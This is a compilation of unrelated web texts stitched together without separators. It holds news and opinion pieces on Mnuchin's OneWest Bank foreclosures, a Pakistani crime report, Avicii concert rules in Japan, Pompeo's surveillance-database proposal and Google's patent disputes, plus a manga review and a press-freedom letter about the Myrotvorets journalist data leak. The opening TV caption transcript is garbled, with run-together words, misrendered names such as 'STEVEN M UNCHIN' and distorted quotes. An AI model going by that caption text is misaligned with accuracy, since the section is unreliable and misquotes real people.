WEBVTT CHARGE.PAUL VAN OSDOL TALKED TO SOMEONEDIRECTLY IMPACTED.REPORTER: THIS WOMAN LOST HERHUSBAND TO CANCER.SHE LOSS HER SON TO AN OVERDOSE,AND THEN SHE LOST HER HOME TOONE WEST BANK.SHE SAYS SHE PLEADED WITH THEBANK TO WORK WITH HER SO SHECOULD SAVE HER HOME.BUT SHE SAYS THEY DID NOTLISTEN.NOW SHE IS WORRIED ABOUT WHATTHAT BANK'S FORMER CEO COULD DOTO THE ECONOMY.>> ONE THING I'LL NEVER ACCEPTIS MY SON'S DEATH.REPORTER: HER SON DIED OFANTICIPATE ACCIDENTAL OVERDOSEIN 2011.>> MY BABY.REPORTER: IT DEVASTATED HEREMOTIONALLY AND ALSOFINANCIALLY.THAT'S BECAUSE JOSEPH WAS LIVINGWITH HER AND HELPING PAY THEMORTGAGE ON HER HOME INWESTMORELAND COUNTY.THE HOUSE WAS BUILT BY HER LATEHUSBAND AND THEIR SUE SONS MORETHAN 30 YEARS AGO.SHE ASKED ONE WEST TO HELP HERKEEP THE HOUSE BY ADJUSTING HERPAYMENT.BUT SHE SAYS THE BANK REFUSEDAND FORECLOSED ON HER.WAS THAT HARD TO TAKE IN.>> YES, DIFFICULT, VERYDIFFICULT.ESPECIALLY WHAT I WAS GOINGTHROUGH WITH MY SON.THEY SHOULD HAVE WORKED WITH METO MEET A PAYMENT THAT HE COULDMAKE.REPORTER: SHE FILED BANKRUPTCYBUT EVEN THAT COULD NOT SAVE HERHOUSE.WHAT IS GOING THROUGH YOURMIND WHEN ALL OF THIS ISHAPPENING.>> A LOT OF DEPRESSION.REPORTER: SHE HAS PLENTY OFCOMPANY.THIS HOUSE IN WHITE OAK.2014, THIS ONE IN NORTHVERSAILLES 2013.THIS HOUSE IN PENN HILLS, 2012.AND THIS ONE IN PITTSBURGH,2011.ALL OF THEM FORECLOSED ON BY ONEWEST OR A SUBSIDIARY WHILE THEBANK WAS RUNNING BY STEVEN M UNCHIN.>> HE WON A FORECLOSURE MACHINEAT ONE WES.REPORTER: SHE HEADS THECALIFORNIA COALITION WHICH HASDOCUMENTED ONE WEST TRACK RECORDNATIONALLY.THE GROUP STUDIED FORECLOSURESON REVERSED MORTGAGERS WHICHPRIMARILY GO TO THE ELDERLY.ALL THESE PITTSBURGH HOMESFORECLOSED BY ONE WEST IN 2011HAD REVERSE MORTGAGES.THE COALITION FOUND ONE WESTHELD 17% OF ALL REVERSEMORTGAGES NATIONALLY BUT THECOMPANY WAS RESPONSIBLE FOR 39%OF ALL REVERSE MORTGAGEFORECLOSURES.>> IT CALLS INTO QUESTION THEPRACTICES OF THIS BANK, ANDAGAIN, ARE THEY CALLOUS LEE FORCLOSING ON SENIORS?ARE THEY CUTTING CORNERS?IF THEY ARE FOR CLOSING AT TWICETHE RIGHT THAT THEY SHOULD BE.REPORTER: M UNC HIN REFUSED THEREQUEST FOR OUR INTERVIEW.A SPOKESMAN SAID ONE WORTH SHOWSONE WEST FORGAVE DELINQUENTBORROWERS MORE OFTEN THAN OTHERBANKS.THEY SAY ANYONE WHO ATTACKSSTEVEN MUMCHIN OVER HIS TRACKRECORD OF SAVING HOMES OFDELINQUENT BARROWESS DOESN'TUNDERSTAND THE FACTS OR HAS ABLATANT POLITICAL AGENDA.ACTION NEWS FOUND ONE PLACE INWESTERN PENNSYLVANIA WAS SUEDBECAUSE OF ERRORS THEY MADE.ONE WEST VIOLATED FEDERAL LAW BYHOUNDING HIM AND MAKING FALSEAND MISMISLEADING STATEMENTSBY DEMANDING MONEY HE DID NOTOWE.THE TASTE WAS SETTLED.IN ANOTHER CASE AN OAKMONTHOMEOWNER SAID ONE WEST CALLEDHIM 56 TIMES OVER TWO MONTHSCAUSING EMOTIONAL DISTRESS AND ABLATANT DISREGARD EVER THE LAW,AND THE ORDERS OF THIS COURT.THAT CASE WAS ALSO SETTLED.AS FOR THIS WOMAN SHE VOTED FORDONALD TRUMP.BUT NOW SHE IS HAVING SECONDTHOUGHTS.IF YOU HAD A CHANCE TO MR. M UNCHIN THE FORMER CEO OF ONE WESTBANK, WHAT WOULD YOU TELL THEM?>> I WOULD TELL HIM THERE AREMANY, MANY MORE PEOPLE LIKE METHAT HE HAS DEALT WITH ANDYOU'VE GOT TO HAVE HEART.REPORTER: HE LEFT ONE WEST LASTYEAR AFTER IT WAS TAKEN OVER BYCIT ANOTHER BANK.HE WALKED AWAY WITH$10.9 MILLION IN SEVERANCE PAY.HIS TRACK RECORD AT ONE WEST ISHE CAN P-BGED TO COME UNDER THEMICROSCOPE WHEN THE SENATE HOLDHEARINGS ON HIS APPOINTMENT AS
Advertisement Trump picks for treasury secretary foreclosed on hundreds of homeowners in Western Pennsylvania OneWest Bank under Steven Mnuchin called "foreclosure machine" by some Share Shares Copy Link Copy
Critics say President-elect Donald Trump's pick for treasury secretary, Steven Mnuchin, ran a foreclosure machine at a major bank. Mnuchin was CEO of OneWest Bank. Action News Investigates has learned that bank foreclosed on hundreds of homeowners in Western Pennsylvania while Mnuchin was CEO. Nellie Mlinek lost her husband to cancer. She lost her son to an overdose. And then she lost her home to OneWest Bank. "One thing I'll never get over is my son's death," Mlinek said. Her son, Joseph, died of an accidental overdose in 2011. It devastated her emotionally and financially. Joseph was living with her and helping pay the mortgage on her home in Ruffs Dale, Westmoreland County -- the house built by her late husband and their two sons more than 30 years ago. She asked OneWest to help her keep the house by adjusting her payment. But she said the bank refused and then foreclosed on her. "They should have worked with me to meet a payment that I could make," Mlinek said. She filed for bankruptcy but even that could not save her house. She said it's caused her "a lot of depression." She has plenty of company. A house in White Oak was foreclosed in 2014.A house in North Versailles was foreclosed in 2013.A house in Penn Hills was foreclosed in 2012.A Pittsburgh house was foreclosed in 2011. All of them were foreclosed by OneWest or a subsidiary while the bank was run by Mnuchin. "Mister Mnuchin ran a foreclosure machine at OneWest," said Paulina Gonzalez, of the California Reinvestment Coalition, which has documented OneWest's track record nationally. In one case, the group studied foreclosures on reverse mortgages, which primarily go to the elderly. Dozens of Pittsburgh-area homes foreclosed by OneWest had reverse mortgages. The coalition found OneWest held 17 percent of all reverse mortgages nationally but the company was responsible for 39 percent of all reverse mortgage foreclosures. "It calls into question the practices of this bank and again, are they callously foreclosing on seniors? Are they cutting corners if they're foreclosing at twice the rate they should be?" Gonzalez said. Mnuchin refused to be interviewed. His spokesperson, Tara Bradshaw, said some government reports show OneWest forgave delinquent borrowers more often than bigger banks. She also said OneWest had an "extremely low error rate." "Anyone who attacks Steven Mnuchin over his track record in saving the homes of delinquent borrowers either doesn't understand the facts or has a blatant political agenda here," Bradshaw said. Action News Investigates found some instances in Western Pennsylvania where OneWest was sued because of errors it allegedly made. In one case, a Venetia homeowner said OneWest violated federal law by "hounding" him and making "false and misleading statements" by demanding money he did not owe. The case was settled. In another case, an Oakmont homeowner said OneWest called him 56 times over two months causing "emotional distress" and a "blatant disregard of the law and the orders of this court." That case was also settled. Mlinek voted for Trump. Now she's having second thoughts. Reporter Paul Van Osdol asked what she would like to tell Mnuchin. "I would tell him there's many, many more people like me that he's dealt with, and you've got to have a heart," Mlinek said. Mnuchin left OneWest last year after it was taken over by CIT. He walked away with $10.9 million in severance pay. His track record at OneWest is expected to come under a microscope when the Senate holds hearings on Mnuchin's appointment as treasury secretary.
The noise as Baloch entered the house woke up Bibi's father-in-law and brothers-in-law
The noise as Baloch entered the house woke up Bibi's father-in-law and brothers-in-law
A Pakistani woman who was having an affair with her cousin accidently suffocated him in a trunk after hiding him there when other relatives woke up late at night, police said Sunday.
Married father Mushtaq Ahmed Baloch, 22, was having an affair with his cousin Rani Bibi, a mother of two, and came to her house at night while her family was sleeping, police said.
The noise as Baloch entered the house woke up Bibi's father-in-law and brothers-in-law, prompting her to hide him in a large tin storage trunk in her room.
She then placed a padlock on the trunk.
But her in-laws came to search the room and Baloch was forced to cry out for help as he was suffocating, police said.
They did not open the trunk and he died within 15 minutes, police added.
The incident took place in the suburbs of the central Pakistan town of Muzaffargarh, late Saturday night.
"We have arrested Bibi's father-in-law and his two sons on murder charges," local police station chief Sardar Muhammad Idrees told AFP.
He said that Bibi's husband was not at home as he had a job in the southern port city of Karachi, some 900 km (550 miles) away.
Muzaffargarh district police chief of Awais Ahmed Malik confirmed the details.
QVC MARINE FIELD, CHIBA
JUN 5(sun), 2016
Open 15:00 / Start 17:00
Arena standing：9,000yen (tax incl.)
Reserved seat：9,000yen (tax incl.)
Platinum ticket：18,000yen (tax incl. / Standing)
MAISHIMA SPECIAL SITE, OSAKA
JUN 4(sat), 2016
Open 16:00 / Start 17:00
Standing：9,000yen (tax incl. plus 1drink charge)
Platinum ticket：18,000yen (tax incl. / Standing)
*In the case of advance tickets being sold out, please note that there will be no tickets at the door available on the day of the show.
*age 6 or over are permitted to enter the premises, and a ticket will be required per person.
*Photo ID (with necessary birthdate on) is required to purchase alcohol at the venue as legal age credential. No drink-drive is allowed.
For Customers outside Japan
ticket is now available via Rakuten Tickets!
*Follow the link and you can make the reservation!
*For customers who live in Japan can also purchase ticket at Rakuten Tickets, along with other vendors shown in this page. Get your tickets before sold-out!
*Please read "IMPORTANT REMINDER FOR CUSTOMERS @AVICII" in English page before you purchase your tickets.
Please note
To AVICII concert customers
*The Artist Line-up is subject to change.
*Absolutely no refunds for line-up changes or any artist's cancellations.
*Admission may be restricted on each stage due to over capacity.
*The stages assigned for all artists are subject to change.
INFORMATION
INFORMATION NUMBER: +81 (0)3-3499-6669 (Mon – Fri 12:00pm～6:00pm JST)
IMPORTANT REMINDER FOR CUSTOMERS @AVICII
Right of Publicity
*Customers are permitted to bring compact digital cameras, cell phones that can take photos, only for the purpose of personal viewing. All professional-caliber cameras are prohibited. In the case of legal confliction arises relating to audio and/or visual recording using any form of recorders/devices, of any individuals including but not limited to performers, audience, and/or public and private facilities, the responsibility shall strictly fall onto the person who acted. The event organizers will under no circumstances become involved.
Personal Belongings
*Any items including food, drinks, dangerous items prohibited by the event organizers may not be brought inside the venue, and will be confiscated at entrance.
*Carrying any articles/items that are considered dangerous and/or illegal into the venues is strictly forbidden, and in some cases, the event organizers shall have the right to ask the person with the item to leave the event site without refund.
*Please be responsible for your own belongings.
*Cooling boxes, mats, cans, bottles, tents and flammables (e.g. fireworks) are prohibited.
*Plastic bottles are allowed to bring inside the building facility, however NOT allowed to bring them into the venues where the actual performances are to be held.
*Pets are not allowed within the venue, with the exception of service dogs, however the owner of the service dogs must be aware that there are limitations to admissions accordingly.
*Baby strollers can be brought inside the venues, however there are limitations to admissions accordingly.
Basic Rules to Enjoy the Event
*Persons who cause trouble at the site, or who ignore the instructions by the event organizers, will be forcibly ejected from the premises and will not be issued refunds under any circumstances.
*The event organizers, artists and the venues will under no circumstances be held responsible for accidents or thefts occurring inside and outside of the venues.
*Dangerous acts such as diving and moshing are prohibited.
*The event organizers will not be held responsible for injuries suffered by way of negligence of personal safety. The event organizers will see to first aid and arrange emergency services in case of injuries caused by prohibited dangerous acts such as diving and moshing, but will thereafter not be held responsible. Furthermore, if such accidents involve a third party, it is the responsibility of all parties concerned to find ensuing action toward legal revisions. The event organizers will under no circumstances intervene or become involved in troubleshooting in such instances.
*The event organizers, performers or venues will not be held responsible for any accidents, mishaps or injuries occurring inside and outside of the venues. We must ask you to take responsibility for your own actions.
*persons found entering the event unlawfully will be taken into police custody for whatever the reasons, and compensation for such actions will be charged.
Tickets
*Ticket is required for anybody who is older than 6 years old per ticket per person, and any child under 5 years old age not permitted to enter the premises.
*Purchaser of the tickets shall NOT re-sell, transfer, auction off the tickets. One-apiece ticket cannot be shared by multiple persons. If such acts are discovered, the persons concerned will be forcibly ejected from the event.
*Tickets are only valid on the day(s)/venue(s) printed on them.
*When tickets are sold out, there will be no tickets sold at the door. Please purchase the tickets in advance.
*All information submitted to purchase tickets will be forwarded to the event organizers.
*In the event of cancellation due to natural disasters, tickets will not be refunded, and all the costs associated with this cancellation such as travel expense to the sites will not be compensated.
Merchandise
*Any official merchandise sold in the venues may not be exchanged or returned after purchase except defective items
Rules in the Event Environment
*The event will take place for long hours. It is your responsibility to make certain of one's physical well-being. Please bring clothing suited for all weather including comfortable footwear (Platform shoes or heels may cause falls), and pay attention to any symptoms of illness, heat and sun exposure,
No Drink & Drive is allowed, please tate public transportation when drinking alcohol.
*Please dispose trash according to its recycled category, and do not trash the streets.
*Please smoke only in the designated areas.
*Please respect the communities and neighborhood around the venues, and refrain from actions disregarding the neighbors including but not limited to; causing unnecessary noises, destroying public/private property/ wildlife, and parking illegally (which may hamper the mobility of emergency vehicles), and littering.
*Overnight camping in the vicinity of the venues is strictly prohibited.
Rep. Michael Pompeo smiles during his confirmation hearing to be CIA director Thursday. The hearing was relocated when a power outage plunged the room into darkness. Manuel Balce Ceneta/AP
President-elect Donald Trump's nominee to lead the CIA defended his proposal to create a "comprehensive, searchable" database of domestic personal records during confirmation proceedings Thursday.
But Rep. Mike Pompeo gave few specifics about his proposed repository of "publicly available financial and lifestyle information" and appeared to back off his call for legislation to allow for inclusion of domestic call records.
Several senators asked the Kansas Republican about the database proposal, outlined last year by Pompeo and attorney David Rivkin in a Wall Street Journal op-ed.
The editorial that became a focus of questioning says in part:
Collection of phone metadata under the Patriot Act was banned by Congress and finally ceased at the end of November. Collection of the contents of specific targets' communications under the Foreign Intelligence Surveillance Act has been dumbed down, with onerous requirements to secure the authorizing court order. The intelligence community feels beleaguered and bereft of political support. What's needed is a fundamental upgrade to America's surveillance capabilities.
Congress should pass a law re-establishing collection of all metadata, and combining it with publicly available financial and lifestyle information into a comprehensive, searchable database. Legal and bureaucratic impediments to surveillance should be removed. That includes Presidential Policy Directive-28, which bestows privacy rights on foreigners and imposes burdensome requirements to justify data collection.
Sen. Ron Wyden, D-Ore., a longtime privacy advocate on the Senate intelligence committee, demanded to know details from Pompeo, who has for years had access to the opinions of spy agencies as a member of the House intelligence committee.
Perhaps surprisingly, given Pompeo's promulgation of the idea, he muffled his call to roll back privacy-minded reforms and de-emphasized his potential role in such an effort.
Though he would lead one of the largest U.S. intelligence agencies, the CIA's focus is abroad and large domestic data-collection historically has been done by the National Security Agency and Federal Bureau of Investigation.
"There are, of course, boundaries to this. First and foremost, they begin with legal boundaries that exist today. That [editorial] was talking about the U.S. government's obligation to do all it can in a lawful, constitutional manner to collect foreign intelligence important to keeping America safe," Pompeo said.
"You said collecting 'all metadata,'" Wyden interrupted.
"I still continue to stand behind the commitment to keep America safe by conducting lawful intelligence collection," Pompeo said. "I was talking about the metadata program that the USA Freedom Act has now changed in fundamental ways."
Pompeo voted in favor of the Freedom Act during its final passage by the House of Representatives. The bill's primary purpose was to end the automatic bulk collection and five-year retention of domestic call records, exposed in 2013 by whistleblower Edward Snowden after years of approval from a secret surveillance court and knowledge of a small number of lawmakers.
Late changes to the Freedom Act caused many original backers to vote against the bill, which also was worded in a way that would ban resumed mass collection of Americans' email metadata, which was ended in 2011. The run-up to a final vote on the bill elicited confusing expressions of support, including from former CIA acting Director Michael Morell, who endorsed the law and resumed mass collection of email metadata.
Wyden, who before Snowden's disclosures elicited a factually incorrect claim from Director of National Intelligence James Clapper about mass domestic collection, pressed Pompeo for his vision of what would not be entered into the "giant database."
"Today, that would be – in most instances, what you referred to, that would be unlawful under current law," Pompeo said. "As the director of the CIA, you have my assurance we will not engage in unlawful activity."
Sen. Roy Blunt, R-Mo., used his speaking time to ask Pompeo if his idea for increased record-collection was primarily geared to items voluntarily posted on social media sites.
"Look, the primary responsibility for that here in the U.S is not the CIA, it would be other agencies within the federal government," Pompeo said. "But, yes, I was referring to things that were in the public space."
Access to records from social media periodically has been controversial, with Twitter restricting access given by third-party tweet-analysis companies like Dataminr to government agents. The CIA was cut off last year from that service, which has a primary function of alerting users to breaking news events.
Though unmentioned at the hearing, the federal government has already put some information on "publicly available financial and lifestyle information" into databases. The Consumer Financial Protection Bureau, for example, has bought credit information records to track the activities of up to 5 million Americans.
Sen. Martin Heinrich, D-N.M., said during questioning that Pompeo would be familiar with effects of the Freedom Act, given his role on the House intelligence committee.
But Pompeo told Heinrich he would need to better understand intelligence programs before proposing specific legal changes.
"I currently have no intention of seeking such changes" to the Freedom Act, Pompeo said, adding later: "I have not heard anything that suggests there is a need for change today."
Apple, Microsoft, and Oracle are a bunch of sore losers who are trying to use a stack of “bogus” patents to stifle and “strangle” the awesomeness that is Android because they can't compete through innovation, or so David Drummond, Google's Senior Vice President and Chief Legal Officer, said in a blog post Wednesday.
Never mind, of course, that it is precisely the lack of innovation that Apple, Microsoft, and Oracle have charged Google with through the numerous patent infringement complaints and lawsuits the companies have launched against the search giant.
Mr. Drummond made the case that the number of Android devices being activated every day, some 550,000 according to Google, are proof that Android is awesome, and that it shows that, “Android and other platforms are competing hard against each other,” though how it shows this he didn't specify.
He added, “But Android's success has yielded something else: a hostile, organized campaign against Android by Microsoft, Oracle, Apple and other companies, waged through bogus patents.”
He accuses Apple, Microsoft, and Oracle of conducting an orchestrated “anti-competitive” campaign to leverage their existing patents, and to buy patents from other companies like Novell and Nortel, to make Android too expensive for hardware manufacturers to use the OS for their smartphones.
“Patents were meant to encourage innovation, but lately they are being used as a weapon to stop it,” he wrote.
Which is a ballsy crock of poop. That's right, a ballsy crock of poop.
Let me amend his sentence so that it's less full of poop: Patents were meant to encourage innovation by arming innovators with the power to stop others from copying and profiting from their innovation.
There, that's less poopful, and it is also a more reasonable characterization of the “orchestrated campaign” being fought against Android by Apple and Oracle. It might even apply to Microsoft, but I know markedly less about Microsoft's patent infringement claims against Android device makers than I do about Apple's and Oracles, and I won't pretend to address those claims.
Google has worked very hard to play the victim in the patent wars, but it does so by ignoring the hard reality behind those wars: The company copied innovation that was invented and brought to market by Apple. It copied Java-related technology owned by Oracle in the process of doing so.
In other words, Google is the one trying to stifle innovation by copying the inventions of others, which is precisely what the patent system was intended to prevent, and crying foul and playing the victim gets zero sympathy from me.
To be certain, the U.S. patent system is a bloody mess. Today we have patent trolls galore who patent a concept and wait for other people and companies who actually produce goods to do something that may utilize that concept so they can sue and earn all manner of licensing fees.
True patent trolls (in my mind) are real leeches on innovation because they don't produce anything, they don't create anything, and they never intend to. They wait for their betters to do the work and then leech profits off the top and call it a day.
At the same time, there are so many patents to navigate, the chances of a small company being able to come up with some kind of disruptive technology and bring it to market in the computer, smartphone, or tablet market is next to nil at this point. It takes too many lawyers and far too much money for that to happen. That is something that definitely limits the potential for innovation.
So there are definitely problems with our current patent system, I just take umbrage at Mr. Drummond's efforts to hide behind those skirts when defending his company.
“A smartphone might involve as many as 250,000 (largely questionable) patent claims, and our competitors want to impose a ‘tax' for these dubious patents that makes Android devices more expensive for consumers,” he said.
A lot of those patent claims are dubious, maybe even most of them, but some of them aren't. Some of them are truly innovative ways of doing something that someone worked long and hard to figure out. A lot of those someone worked at Apple while the company toiled for years to invent a touchscreen operating system that would revolutionize the cellphone industry.
Nokia is another company that has innovated in this area. The company figured out how to do some things that ended up becoming foundation technologies in the cell phone industry, and were deemed to so important the company was required to license them on a fair, reasonable and non-discriminatory basis.
Apple refused to pay the company's licensing demands (Apple accused Nokia of trying to extort money above the fair and reasonable licensing terms Nokia was required to charge), and when Nokia sued, the two companies eventually came to terms.
Apple should not have been allowed to use the technologies that Nokia had invented, as was made loud and clear by the Apple haters when that battle was being fought at the beginning of this patent war, and in the end it was not allowed to do so.
Google is in a similar spot with Android, in my mind. Apple invented a new and disruptive smartphone with a touchscreen interface that had never been done before.
Let me be clear about that: Before iPhone, there was no touchscreen smartphone. Before iPhone, Android was a keyboard-driven affair that would have put the hurt on RIM's BlackBerry had iPhone not come out before it could do so. But iPhone did come out, and it changed the rules in the process, and Google quickly adapted Android to compete with iPhone instead of BlackBerry.
Just as RIM itself did, though it did so poorly.
To get there, Google had to step on Oracle's toes, too, building a proprietary version of an open source Java derivative that Oracle says infringes on its Java patents (remember that Oracle bought Sun, the inventor of Java). That battle is still being fought.
To get back to the central point, Google claims that the patent system was intended to encourage innovation, and that is true, but the company is blithely ignoring the fact that when it comes to Google, Oracle, and Apple, the patent system was designed to protect the true innovators, Apple and Oracle, against Google, the copier.
Google isn't the victim in the patent wars, it's the perp.
Hell, even Microsoft, a company NOT known for being innovative, went its own way with Windows Phone 7.
The patent wars are currently being fought by proxy, at least by Apple, with the iPhone maker suing hardware makers for infringement. Apple has not yet sued Google directly, and Apple's precious touch-related patents haven't yet been litigated.
My personal assumption is that Google eventually will be sued by Apple, and I would imagine that without substantive changes to Android, changes that will no doubt make the smartphone OS less user-friendly, Google will lose.
And this is a curious little manga.
Boku ni Koisuru Mechanical (僕に恋するメカニカル, Mechanical Love) is a seinen manga by Watarai Keiji (渡会けいじ) that's basically Terminator 2 x silly manga romance parody — a kind of love letter to things the mangaka is clearly very fond of. Watarai-sensei is actually one of my favorite artists, and when I saw this was a new series of his (at the time, years ago) I was pretty excited. I first learned about him with his manga O/A, which I'll probably review later. O/A really hooked me for some quite bizarre, quite hilarious humor on top of really strong art that was both cute and cool. I felt a resonance with Watarai-sensei's likes (perhaps because he's such a westaboo — a huge fan of western culture), and have since become a fan of his. Mechanical started off strong for me with its first two chapters, seeming like an opportunity for the author to do whatever the Hell he wanted. Pretty cool. However, to be honest, I think that while this series has a lot of good things about it — both in concept and in execution — it's missing some things that would make it truly great. Much as I like it, I can see why it was finished within 14 chapters at 3 volumes.
The premise is simple, but there's quite a bit to it. We start the series by meeting this guy:
Shinjou Maita. He's a fairly standard college-age otaku (in his case, a movie nerd): passionate about what he's into, not very sociable, unliked, and rather cynical. The series begins with him getting kicked down after saying some rude things to a pair of girls mocking him (because he was in a zombie costume, recruiting for his school's movie club), but then a beautiful girl appears to help him.
This very cliche scene does indeed seem to be the start of a love comedy. This girl, Hotohara Shiori, comes to Maita to join the movie research society. They get along pretty well, and on their walk home after school's let out she reveals that she joined the club because of him!
Maita is ecstatic. He doesn't question why someone would suddenly be interested in him. As a reader, you can assume the two of them made a promise under a sakura tree long, long ago or something. Well, whatever the reason, it doesn't matter to our protagonist because he's just happy someone has shown him affection.
He gets back to his apartment, but is shocked to see it broken in. He picks up a bat, bracing himself for a burglar.
Unexpected!
Kind of a lot happens after this, a lot of which needs explaining, but I don't think it's a good idea to go over every one of the significant plot details. So, here's the rundown:
Understood? Alright, so, with this you should expect the series to mostly be about Maita getting into sexual situations with robot girls and then getting saved in the nick of time, but — “spoilers” — that only really happens one more time after chapter 1, and even during that time Maita already knows to not expect any sudden romance from random girls. Instead, this series is mostly a slice of life/romance where Maita lives with his robot guardian (who he nicknames Sutako) and slowly develops a relationship with Integra. The series is pretty down to earth with occasional spikes of zaniness for comedic effect. In my opinion, it has a kind of nostalgic atmosphere, as there is quite a bit of emphasis on the past and on Maita teaching Sutako things about the world and culture. There's also some action it is, and I think it's really cool action, but it's certainly not the focus.
There isn't much more I can say about the story and characters from hereon. Dr. Camilla is lackadaisical but keeps things under control, Integra is a straight-laced tsundere who's kind of a goofball, and Sutako is a cute, quiet little robot who learns more things over time. To me the best aspect of the series is seeing Maita's daily life with Sutako. These moments are funny, cute, and heartwarming. However, there's a little problem with it, and as I explain that problem I'll explain some other faults.
Boku ni Koisuru Mechanical has weird pacing. While the scenes between Sutako and Maita are nice, logically speaking they may not be earned. Very shortly after the manga starts, they have suddenly been living together for days. Their regular daily life is explored largely in a flashback chapter, which is a good chapter, but we didn't really get much between them beforehand to make that chapter and their brother/sister (maybe father/daughter) sort of relationship feel as significant as it could. It sort of feels like the series is missing some transitional parts that could bind the good stuff in the manga together and make big moments bigger. Because it's like this, character-based jokes also feel a little weaker because we haven't gotten a lot of time to get to know the characters. Sutako is probably the best, most well-rounded character in the series such that it's worth reading for her alone, but having read the author's work previous to this, O/A, I know he's capable of fleshing out characters better than this and can really get the reader endeared to a fairly wide cast.
I can't say “in fairness, the series ended quickly so we just COULDN'T get a full grasp on the whole cast” because Sutako is quickly likable, her rival robot from the future is a strong character, there are two other characters introduced later that are pretty great, and Dr. Camilla has potential as a funnier character. Maita, Integra, and another significant character are ones I'd call important, but they're not as strong as the rest, which isn't the best thing since we see them a lot. Maita could be a lot better, which is really clear to me from one of the final chapters which was really quite good and focused pretty much exclusively on him and his development. Prior to that, though, he was pretty much a typical protagonist that was serviceable and that's about it.
I would still recommend this series, however. It's not bad at all, honestly. It's very funny and entertaining (featuring some weird and unique humor as well as sexual humor if you're into that), it's very well drawn (the art style is adorable, but also awesome when it needs to be), and aspects of it are truly excellent. It's really a damn shame it couldn't quite bring all of itself together to really make Watarai-sensei's vision shine. In the last few chapters, perhaps because he knew it was ending, there are some really stellar things on display. For instance, the penultimate chapter is amazing and I really, really enjoyed pretty much everything about it. The chapter before that one? A very nice one for Integra and Maita. I have to wonder if, had it been allowed to go further, the series would have gotten better and better. I feel like it would've. The author VERY UNSUBTLY indicated as much in the last chapter. After explaining what the series would have been and hinting at more, he speaks through a character lamenting in the final panels that they wanted to do something cooler than this, but now it's ruined, bitterly declaring this all “lame”.
In the end, I find this manga quite interesting. It's a great thing to see an artist have such loose and free reign with what they want to do, but a little sad seeing how it died early, for whatever the reason. I may have problems with it, and that blunt ending might leave you feeling bad, but I nonetheless think you should give the series a shot. You might like it even more than I did! In any case, I've got my eye on Watarai-sensei's latest work (Benten Rock You.) and am I hoping it turns out better (update: it also ended in three volumes; bummer).
Thanks for reading. Hopefully see you next week.
Import Boku ni Koisuru Mechanical:
Bookwalker (guide), CDJapan, honto (guide), ebookjapan
Watarai Keiji's Bookwalker author page: [link]
Watarai Keiji
O/A
May 24, 2016
His Excellency Petro Poroshenko,
President of Ukraine
Bankova st, 11
Kiev, Ukraine
Sent via e-mail and facsimile: [email protected]; [email protected]; +380 44 255 6161
Dear President Poroshenko:
We at the Committee to Protect Journalists, an independent, press freedom advocacy group, write to express our support for Ukrainian prosecutors' investigation into a Ukrainian website's defamation of thousands of local and international journalists and human rights activists as "terrorist accomplices," and to express our shock that instead of condemning the act that puts our colleagues' lives at risk, senior Ukrainian government officials have praised this deliberate attempt to intimidate journalists and potentially to put them at risk.
A group of hackers on May 7 announced on a website called Myrotvorets (Peacemaker) that they had breached computers pro-Russian separatists in eastern Ukraine used to keep track of journalists they had allowed to work in the region, and published a database containing the names, affiliations, and contact information of more than 7,000 individuals. The database included 4,508 local and international journalists and media workers who have reported from the conflict zone. According to CPJ research, the separatists have been collecting journalists' contact information as part of an accreditation process even though their authority over eastern Ukraine is not internationally recognized.
Human rights groups report that journalists have been threatened following the publication of their contact details. Ukrainian journalist Roman Stepanovych, for example, told the group Mapping Media Freedom that he had received threatening emails since the list's publication.
We are troubled that Ukrainian officials, including Anton Geraschenko, a member of Ukraine's parliament, and Arsen Avakov, Ukraine's interior minister, praised the publication of the list in statements published on their social media accounts. In a post to Facebook, Geraschenko praised Mirotvorets for publishing the data, accused the journalists on the list of aiding terrorists and of spreading Russian propaganda, and suggested that Ukraine should take tough measures, including censorship, in response.
We are shocked that Avakov, who, as interior minister is ultimately responsible for investigating the incident and protecting journalists, praised the website and blamed the journalists for registering with separatists.
"Do not blame Myrotvorets in this case," Avakov wrote on Facebook. "The journalists made their choice when they handed their own personal data to the bandits from the occupying regime."
The publication of the journalists' contact information, and the unfounded accusations that accompanied it, drew domestic and international outcry. Local and international reporters and press freedom advocates noted that reporting on a conflict is not a crime. CPJ unreservedly agrees that the journalists did nothing wrong in reporting on a conflict of international concern.
As Thorbjørn Jagland, secretary general of the Council of Europe, wrote in a May 13 open letter to you, the release of the journalists' information violated Ukraine's obligations under the European Convention on Human Rights and the data-protection standards of the Council of Europe. In a May 24 meeting with Avakov, European Union ambassadors to Ukraine Jan Tombinski and Christof Weil urged the minister to ensure the removal of journalists' data from the website, to prosecute those responsible for the leak, and to protect reporters in light of the threats they have received since the publication of their personal information.
We applaud Ukrainian prosecutors' May 11 announcement that they had opened a preliminary investigation into the website, and we call on them to complete their investigation thoroughly. We call on you to support this investigation, and to make clear your government's committment to press freedom and the safety of journalists.
We view this is especially urgent because Myrotvorets continues to release journalists' personal information.
In a statement published on May 20, the creators of Myrotvorets wrote: "Many journalists demanded an apology from us, and now we understand the reason for this. The staff of [Myrotvorets] offer their sincere apologies in regards to the list's not being fresh."
The statement said that the website initially published data retrieved in December 2015, whereas the new list, which it said consists of contact details for 5,412 reporters, among them 2,082 Russian journalists, 1,816 international correspondents, and 1,514 Ukrainian journalists, was collected in February 2016.
On May 24, Myrotvorets released yet another list, this time also including the home addresses for 239 Ukrainian and international journalists working in Russia, news reports said.
Announcing today's release, the website said that the list includes journalists who "cooperate with the aggressor state that funds international terrorism and has occupied a part of Ukrainian territory."
We call on you to condemn the unfounded and damaging allegations published on Myrotvorets, and to clarify publicly that the Ukrainian Interior Ministry is dedicated to protecting journalists and apprehending the people responsible for threatening them, in contrast to Interior Minister Avokov's previous statements.
Sincerely,
Joel Simon
Executive Director
CC:
Arsen Avakov, Minister of Internal Affairs of Ukraine
Pavlo Klimkin, Minister of Foreign Affairs of Ukraine
Yuriy Lutsenko, Prosecutor General of Ukraine
Valeriya Lutkovska, Ukrainian Parliament Commissioner for Human Rights
Federica Mogherini, High Representative of the European Union for Foreign Affairs and Security Policy
Thorbjørn Jagland, Secretary General of the Council of Europe
Nils Muižnieks, Council of Europe Commissioner for Human Rights
Johannes Hahn, EU Commissioner for Neighborhood Policy and Enlargement Negotiations
Valeriy Chaly, Ambassador of Ukraine to the United States
Geoffrey R. Pyatt, U.S. Ambassador to Ukraine
Stavros Lambrinidis, EU Special Representative for Human Rights
Dunja Mijatovic, OSCE Representative on Freedom of the Media
We second Kerry Cook's gratitude to the Alameda Unified School District for creating the Community Advisory Committee, albeit for entirely different reasons. We are thankful that the district is working to create a more inclusive and tolerant environment in our schools.
